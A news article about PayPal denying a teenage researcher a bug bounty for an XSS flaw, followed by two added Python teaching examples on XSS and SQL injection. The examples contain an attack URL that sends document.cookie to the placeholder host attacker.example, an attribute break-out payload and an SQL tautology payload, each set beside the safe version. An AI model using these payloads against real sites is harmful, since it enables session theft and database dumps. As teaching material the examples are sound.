PayPal denies stiffing bug-hunting teen on bounty

Someone else got there first, claims firm


PayPal has denied that it refused a teenage security researcher a reward for finding a potentially nasty bug on the basis that he was too young. The payments processing firm said that while it had denied the 17-year-old a reward, it was because another researcher had already reported the flaw.

Robert Kugler, 17, found a cross-site scripting flaw on the payment processing firm's website before claiming a reward under PayPal's bug bounty programme.

Initially, Kugler claimed PayPal had told him in an email that he was ineligible for a reward because he was too young.

The terms and conditions for the reward scheme do not mention anything about the bounty being restricted to those over 18.

The German student recently published details of the bug, along with what he claimed were extracts from his email correspondence with PayPal, on a full disclosure mailing list, provoking damaging headlines along the lines of "PayPal Stiffs Teen Who Found Website Bug".

In response to queries from El Reg, PayPal said Kugler had been denied the reward not because he was too young, but because someone else had previously reported the same flaw, directly contradicting Kugler's account.

The eBay payments subsidiary said it was resolving the vulnerability, stressing that there was no evidence that it had been abused in any attacks to date and therefore no need for undue concern.

While we always appreciate contributions by the security community to PayPal's Bug Bounty Program, we reward participants when they are the first to report valid security vulnerabilities.

In this specific situation, the cross-site scripting vulnerability was already discovered by another security researcher, so [the bug] would not have been eligible for payment, regardless of age [of the researcher], as we must honour the original researcher that provided the vulnerability.

We appreciate the security researcher's efforts and this situation illustrates that PayPal can do more to recognise younger security researchers around the world. As a first step, we are sending an official letter of recognition for the researcher's contribution and we are exploring other ways to recognise younger security researchers when they do discover a vulnerability and responsibly disclose that discovery.

PayPal's conditions do state that its bounty is only awarded to the first person that discovers the previously unknown bug. El Reg asked PayPal which researcher was first to report this bug, as well as how many bug bounties it had paid out. It declined to answer both questions, so we're none the wiser.

"PayPal does not share the details on the researchers or the number of bugs found," a spokesman said.

Kugler said he is less than impressed with PayPal's handling of his vulnerability report and how it runs its bug bounty programme more generally.

"It's a strange behaviour from PayPal," Kugler told El Reg. He claimed: "In my email correspondence with PayPal, no one ever mentioned someone else found the bug! They only said: 'You're disqualified because of being 17 years old'."

He went on to claim: "After all that media attention they introduced: 'No, we disqualified his bug because someone else already found it, not for being 17 years old'. Maybe it's just me, but I think they just want to avoid the payment. Two security researchers (one from China and one from India) found the same bug and always the same reply: Someone else found it, we are sorry!"

XSS marks the spot

Cross-site scripting (XSS) vulnerabilities arise from web application development mistakes: the application echoes untrusted input, such as a search term, back into a page without encoding it for the context it lands in. An attacker who can get a victim to load a crafted link or page then has their own script running with the origin of the site the victim is visiting, so anything it injects, pop-ups included, appears to surfers as originating from that site and can read or act on whatever that site exposes to its own pages. XSS flaws are a common vuln, most regularly abused in phishing attacks.

The cross-site scripting flaw in the search function on PayPal's German site which Kugler (and perhaps others) discovered is a bit more serious than a cosmetic pop-up, however, because script running under PayPal's own domain is capable of being abused to access credentials, for example by presenting a convincing fake login form on a genuine PayPal page.

"An XSS attack occurs when a script drawn from another website is allowed to run but should not," Kugler explained. "The type of flaw can be used to steal information or potentially cause other malicious code to run."

The PayPal XSS bug was fixed on Wednesday, according to Kugler.
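The page gives no code for the flaw itself, so the following is an added example, not PayPal's code and not Kugler's: a minimal search results handler written two ways, the unsafe one interpolating the query straight into the HTML and the hardened one encoding it for the context it lands in. The hostname, the `q` parameter, the page template and the attack URL are all constructed for the demonstration.

```python
# Added example (not PayPal's or the researcher's code): a search page that
# reflects the query parameter into HTML, rendered unsafely and then safely.
import html
from urllib.parse import parse_qs, urlsplit

# Constructed template: the query lands in a text node and in a quoted attribute.
PAGE = '<h1>Search results for: {q}</h1>\n<input name="q" value="{q_attr}">'


def query_from_url(url: str) -> str:
    """Extract the q parameter the way a server sees it (percent-decoded)."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_unsafe(query: str) -> str:
    """Vulnerable: no encoding, so '<script>' becomes a live tag and a stray
    double quote closes the value attribute and lets new attributes in."""
    return PAGE.format(q=query, q_attr=query)


def render_safe(query: str) -> str:
    """Hardened: html.escape encodes < > &, and with quote=True also " and ',
    which covers both the text node and the double-quoted attribute above."""
    enc = html.escape(query, quote=True)
    return PAGE.format(q=enc, q_attr=enc)


def injects_script(page_html: str) -> bool:
    """Crude check used here instead of a browser: is there a literal <script
    tag in the output? An encoded &lt;script&gt; is inert text."""
    return "<script" in page_html.lower()


def breaks_attribute(page_html: str) -> bool:
    """Did the input escape the value="..." attribute and add an event handler?"""
    return 'onfocus="' in page_html


# Constructed attack URL: a reflected payload that ships document.cookie to an
# attacker-controlled host (both hosts are placeholders, not real sites).
ATTACK_URL = (
    "https://search.example/results?q=%3Cscript%3Edocument.location%3D"
    "%27https%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie"
    "%3C%2Fscript%3E"
)
ATTR_PAYLOAD = '" onfocus="alert(1)'   # constructed attribute break-out

if __name__ == "__main__":
    q = query_from_url(ATTACK_URL)
    print("unsafe:", render_unsafe(q))
    print("safe:  ", render_safe(q))
```

The encoding has to match the context: `html.escape` is right for an HTML text node or a quoted attribute, but a value dropped into a `<script>` block, a URL, or an unquoted attribute needs a different encoder, and a template engine that auto-escapes by default removes the chance of forgetting.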

A bug's life

Bug bounty programmes have become commonplace across the industry over recent years. The schemes offer an incentive for researchers to report flaws to vendors, rather than selling details of them on vulnerability marketplaces to whoever stumps up enough cash.

Google, in particular, is an expert at attracting media attention to its own bug bounty programme. PayPal, by contrast, is reluctant to talk about its own vulnerability reward scheme, perhaps because the nature of its payment-handling business makes it reluctant to get drawn into any kind of discussion about the security of its website.

The only known recipient of a bug bounty from PayPal is Germany-based security research outfit Vulnerability Laboratory, which earned a $3,000 reward back in January after discovering and reporting a critical bug to PayPal five months prior.

The flaw, a SQL injection vulnerability in the official PayPal GP+ Web Application Service, meant that user-supplied input was reaching a database query without being properly separated from the query text. That created a potential mechanism for hackers to inject commands through the web app into the backend databases, potentially tricking them into coughing up sensitive data in the process.
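Nothing on the page shows the GP+ query, so the following is an added illustration of the bug class, not Vulnerability Laboratory's finding or PayPal's code: an in-memory SQLite table with a lookup built by string splicing next to the same lookup as a parameterised query. The table, its rows and the payload are constructed for the demonstration.

```python
# Added example (not PayPal's or the researchers' code): SQL injection in a
# spliced query versus the same query parameterised, against constructed data.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two merchants, each with a secret API key."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE merchants (id INTEGER, name TEXT, api_key TEXT)")
    con.executemany(
        "INSERT INTO merchants VALUES (?, ?, ?)",
        [(1, "shop-a", "KEY-A"), (2, "shop-b", "KEY-B")],
    )
    return con


def lookup_unsafe(con: sqlite3.Connection, merchant_name: str):
    """Vulnerable: the caller's string becomes part of the SQL text, so a
    quote followed by OR '1'='1 turns a one-row lookup into a full dump."""
    sql = "SELECT name, api_key FROM merchants WHERE name = '%s'" % merchant_name
    return con.execute(sql).fetchall()


def lookup_safe(con: sqlite3.Connection, merchant_name: str):
    """Hardened: the value travels as a bound parameter, never as SQL, so the
    same payload is just an unusual name that matches nothing."""
    return con.execute(
        "SELECT name, api_key FROM merchants WHERE name = ?", (merchant_name,)
    ).fetchall()


PAYLOAD = "x' OR '1'='1"   # constructed tautology injection

if __name__ == "__main__":
    db = make_db()
    print("unsafe:", lookup_unsafe(db, PAYLOAD))   # every row, every key
    print("safe:  ", lookup_safe(db, PAYLOAD))     # nothing
```

The tautology payload is the least an injection can do; the same splice point also allows UNION-based reads of other tables, and in drivers that accept stacked statements, writes. Parameterised queries close all of those at once because the database never parses the input as SQL.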

Although he struck out when he reported a problem to PayPal, Kugler has successfully collaborated with other vendors.

The German teen has received a $3,000 award from Mozilla for finding a privilege escalation bug in Firefox, and another $1,500 for locating a separate flaw in Mozilla Updater. He also received a hat tip for security research from Microsoft, getting a shout out on its list of security researchers - though no financial reward for his efforts as yet.

"IT security is an interesting topic and I like to test things," Kugler told El Reg. "Sometimes things work differently under special circumstances, it's exciting to study this behaviour." ®

* Additional reporting by Iain Thomson

Biting the hand that feeds IT © 1998–2022